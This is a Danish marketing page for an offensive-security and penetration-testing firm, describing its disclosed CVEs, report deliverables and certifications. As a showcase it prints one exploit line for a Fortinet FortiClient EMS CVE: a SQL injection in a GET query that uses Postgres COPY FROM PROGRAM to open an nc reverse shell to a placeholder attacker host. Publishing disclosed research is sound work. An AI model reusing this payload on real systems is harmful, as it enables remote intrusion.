Offensiv sikkerhed · Danmark

Vi finder de sårbarheder,
andre overser.

Baldur Security er en dansk, research-drevet virksomhed, der laver offensiv sikkerhed og penetrationstest. Vi har ansvarligt offentliggjort sårbarheder, der har ført til CVE’er i software, som millioner bruger, heriblandt Chrome, Fortinet, Mitel, PRTG, Nagios og WithSecure. Vi tester jeres systemer på samme måde.

Beviser i stedet for ord

Offentlige CVE’er i software, I sandsynligvis kører

Det er det samme arbejde, vi udfører på jeres systemer, ikke en scannerrapport med nyt logo. Uddrag fra vores research; hele listen finder I på research-siden.

ArtefaktCVE-2025-59922 · Fortinet FortiClient EMS
# Ét <img>-tag blev til en GET-baseret SQL injection, der gav remote code execution
GET /api/v1/malware/threats?query=a');COPY pwn FROM PROGRAM
    'rm /tmp/a;mkfifo /tmp/a;cat /tmp/a|/bin/sh -i 2>&1|nc ATTACKER 8959 >/tmp/a';--
Postgres FROM PROGRAM forvandlede en gemt avatar til en reverse shell. Hele kæden →
Leverancer

Hvad I får

Hvert engagement slutter med bevis, I kan handle på, og dokumentation, I kan give revisorer, kunder og bestyrelsen.

Rapport

  • Et ledelsesresumé til beslutningstagere
  • En teknisk del, jeres team kan handle på linje for linje
  • Prioritering efter reel udnyttelighed, ikke bare et CVSS-tal
  • En retest, efter I har rettet, i en opdateret rapport

Ekspertpræsentation

  • En gennemgang af hvert fund med live Q&A
  • Spørg os om alt ved testen, metoden eller rettelsen
  • Leveret til både ledelse og det tekniske team

Attesteringsbrev

  • En underskrevet, ikke-følsom bekræftelse på testen
  • Til myndigheder, kunder og revisorer
  • Nok til at besvare et leverandør-sikkerhedsspørgeskema
Ydelser

Otte veje ind

Ét team. Er det, I skal have testet, ikke på listen, så spørg, de interessante mål passer sjældent i en kategori.

Certificeringer

Fundamentet under vores track record

12+ års erfaring på tværs af sektorer som bank, sundhed og det offentlige, for organisationer fra 10 til 10.000 medarbejdere. Vi vægter praktisk erfaring højest og har certificeringerne til at bakke det op.

33offentliggjorte CVE’er
100+gennemførte penetrationstests
300+bug bounty-rapporter
OSCE / OSCPOSCE / OSCP-certificeret
Offensiv sikkerhed
OSCE
Offensive Security Certified Expert. Exploit-udvikling og avancerede web-angreb, de færdigheder, der ligger bag memory corruption- og RCE-fundene i vores liste.
Penetrationstest
OSCP
Offensive Security Certified Professional. En praktisk eksamen i at finde og udnytte sårbarheder under tidspres, uden at værktøjer gør arbejdet.

Fortæl os, hvad der skal testes

Et opkald på 30 minutter er nok til at scope de fleste opgaver. Ingen salgstale, kun resultater. I taler med dem, der udfører testen.

Book et scoping-opkald